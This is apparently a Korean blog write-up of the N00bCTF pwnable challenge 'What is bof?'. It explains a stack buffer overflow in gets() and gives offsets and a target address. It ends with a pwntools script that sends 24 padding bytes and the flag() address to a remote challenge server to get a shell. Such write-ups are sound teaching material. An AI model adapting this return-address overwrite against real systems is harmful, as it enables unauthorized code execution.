시스템 해킹/N00bCTF - Pwnable
N00bCTF - What is bof?
ii4gsp
2020. 2. 10. 21:17
파일을 다운받아 주자.
파일을 IDA로 열어보면 gets()함수에서 취약점이 발생한다는것을 알 수 있다.
s는 0x14 즉, 10진수로 20만큼 할당되었고 sfp까지하면 24byte이다.
s ~ sfp 만큼 24byte를 덮어주고 ret를 flag() 함수의 주소로 조작하면 쉘을 획득할 수 있다.
flag()함수의 주소는 0x08048516 이다.
Exploit
from pwn import *
r = remote('52.79.224.215', 30005)
payload = ''
payload += '\x90' * 24
payload += p32(0x08048516)
r.recvuntil('>> ')
r.sendline(payload)
r.interactive()